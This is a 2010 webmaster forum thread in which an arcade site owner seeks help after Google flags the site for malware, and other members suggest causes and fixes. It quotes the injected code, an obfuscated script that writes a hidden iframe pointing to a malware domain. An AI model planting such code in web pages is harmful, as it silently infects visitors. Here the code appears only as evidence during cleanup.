aarrghh...... got malware on my ats site.

**ZyPhiX** · 09-13-2010 04:25 AM

got this message today from google:

Code:

Dear site owner or webmaster of nowgamez.com
 
,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://nowgamez
 
.com/
http://www.nowgamez
 
.com/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//nowgamez.com/

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security
 

Once you've secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team

Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.

In the webmasters it showed this:

Code:

Malware
« Go back

URL: http://www.nowgamez.com/
 

Last checked: September 12, 2010

Suspected injected code     Instances
<script>document.write(unescape('%3C%73%70%61%6E%20%73%74%79
%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E
%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F
%77%77%77%2E%67%75%6F%75%6F%2E%63%6F%6D%2F%69%6D%67%2F%2E%6E
%65%65%64%65%64%2F%65%6E%74%2E%70%68%70%22%3E%3C%2F%69%66%72
%61%6D%65%3E%3C%2F%73%70%61%6E%3E'));</script>

if I check this link:
http://www.google.com/safebrowsing/d...w.nowgamez.com

Code:

it says:
What happened when Google visited this site?

    Of the 5 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-12, and the last time suspicious content was found on this site was on 2010-09-12.

    Malicious software is hosted on 1 domain(s), including guouo.com/
 
.

    This site was hosted on 1 network(s) including AS21844 (THEPLANET).

The google fetch bot, says success (in webmaster tools).

Any ideas what caused it or what to check? I've already checked all files for this code, but nothing found....

damn....

**RickyG** · 09-13-2010 08:02 AM

That sucks!

I have been seeing this more lately...must be a new wave of hackers out there

**brendgard** · 09-13-2010 02:43 PM

Pull up the page in a computer you don't care whether it gets infected or not, and look for that code on the finished page, not just the script code files. That could give you a better idea of which file needs closer inspection.

1) You might not be looking for something even looks like that. It could be something included or embedded from another site, like a Flash file might be.
2) It could be advertising. We've seen banner exchanges and ad networks have this problem before. Check out all the banner exchanges shown on your site, and all the ad networks, by opening them each up in a window and refreshing several times to see if anything pops up.
3) It could be something along the lines of the hacker stored that code in a database entry somewhere, instead of a file.

Again, if you pull it up and check the finished page rather than the code files, it might offer a better clue as to where to find it in a case like these.

If you find something, let us all know so we can be on guard.

**Stephan** · 09-13-2010 03:04 PM

You know your site is very popular? You still send hits to my SFG, looks like some of your users don’t care about the warning

Strange is, yesterday your other site showed a banner exchange (gamerflux.com) who is blocked, and now this site is infected!?

Can this affect more sites on one server?

**ZyPhiX** · 09-13-2010 03:18 PM

just a quick update, I've found where it was inserted.

It was inserted in de database, in the configuration table in the field "seoText ". The code was there at the end, exactly like I quoted before....

have to find out more... keep you updated.

**brendgard** · 09-13-2010 03:18 PM

Depending on how the code is injected, yes. Usually though it only affects one site. Most times hackers don't gain enough access to look for other site's files, and so move on to the next target. Many times it's not even in the site itself, but in something being included from another site such as a banner exchange code or advertising network's ads. If Gamer Flux was spitting out malware code through it's iframe exchange code for instance, it would not be the arcade itself, but it would be reported as if from the arcade. And even if not from the arcade itself but through such a means as the iframe for an exchange like Gamer Flux, it could still infect user computers without needing to gain access to the arcade's own code. I'm not saying Gamer Flux is spitting out malware though, just using it for the example because you brought up that name.

**Stephan** · 09-13-2010 03:26 PM

How this works???
Can somebody inject thru a simple image? gif, png, jpg?

**brendgard** · 09-13-2010 05:10 PM

Short answer yes, long answer it's possible, especially on unpatched Windows boxes, but that is not what I'm referring to.

They are not just simple graphics files, they are specially crafted files that are named with a .png, .jpg, or .gif extension. Usually it has scripting code for Windows to make it install itself on the target box, but with enough of the graphic file intact to actually show a pic so that the person does not know what has happened. Mickeysoft released a patch some time ago, but how many boxes are out there running an un updated version? But again, this is not what was meant. This targets the visitor's computer, not the site itself.

If a script allows uploads that are not checked, the hacker can also use that to upload a script file that ads something to files or the database. I've not heard of any scripts that allow for files to be uploaded with out some sort of check on them. Most servers will not attempt to run a file with a .gif extension because it sees that extension as being only a graphic file, never an executable one. So even checking the file extension when uploading tends to weed that sort of nonsense out. Files named with extensions for images are mainly aimed at the visitor.

No, when we talk about a banner exchange or ad network infecting a box, the offending site is usually adding in extra code to their regular exchange code base, or the advertiser is crafting their ads to do it, or Flash is involved. Most banner exchanges are coded to take in the member site's URL to credit their account with the impression/click, and then spit out a link back to themselves that leads to some other site. The link has a banner attached to it, and a URL with the info encoded into it. Some banner exchanges in the past have been hacked or have sold out, and extra code has been attached after this, code that installs the malware. We had one a while back that in addition to serving up an impression for the member's site who's banner was being shown, also caused a couple pop unders to be served. Kinda ticked some people off that time. Or the member who's site is the one being served an impression that go round in the banner exchange's iframe might use an infected graphic, or a Flash file that redirects or installs malware. These are some of the reasons to stick with known good banner exchanges and ad networks. Come across a banner exchange that doe not allow Flash banners? Might a sign that they are trying to weed out bad banners rather than not be responsive to customer's wishes to use them. Flash banners have caused a lot of heartburn in the past.

With it being found in the database, I seriously doubt that a banner exchange or ad network did this. They normally go after the visitor.

**RickyG** · 09-13-2010 05:18 PM

DB = hacker

**ZyPhiX** · 09-13-2010 05:27 PM

since it was inserted in the seo text field in the configuration table.... it can be done using the admin panel or straight into the DB, but that last option I don't assume, that is too hard to find, then you will choose other tables or even more databases....

but anyway, I changed all the files, checked the DB. Changed my hostgator password, ftp password, database login for ats and the admin account itself. And now I'm reinstalling windows too :-)

I'm glad I also have a laptop, boring to see windows 7 installing :P

Thread: aarrghh...... got malware on my ats site.

Thread Tools

Search Thread

Display

aarrghh...... got malware on my ats site.

Tags for this Thread

Posting Permissions